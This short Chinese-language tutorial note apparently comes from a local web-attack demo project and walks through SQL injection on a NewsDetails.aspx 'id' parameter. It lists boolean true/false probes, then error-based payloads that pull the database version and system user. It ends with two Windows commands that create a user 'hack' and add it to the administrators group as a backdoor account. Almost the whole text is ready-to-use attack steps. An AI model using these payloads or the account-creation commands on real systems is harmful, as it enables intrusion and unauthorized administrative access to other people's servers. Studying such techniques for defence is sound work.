SQL注入攻击(中)
源文件: d:\code\web-attackDome\web-attackDome\sql-injection\地址栏注入演示\NewsDetails.aspx.cs
Articles
ID
判断是否存在注入:
第一步:'
第二步:http://localhost:1164/sql-injection/地址栏注入演示/NewsDetails.aspx?id=1' and '1'='1
第三步:
http://localhost:1164/sql-injection/地址栏注入演示/NewsDetails.aspx?id=1' and '2'='1
====================================================================================查版本:
http://localhost:1164/sql-injection/地址栏注入演示/NewsDetails.aspx?id=1' and 1=(select @@version) and '1'='1
查用户:
http://localhost:1164/sql-injection/地址栏注入演示/NewsDetails.aspx?id=1' and 1=(select system_user) and '1'='1
net user hack 123456 /add
net localgroup administrators hack /add
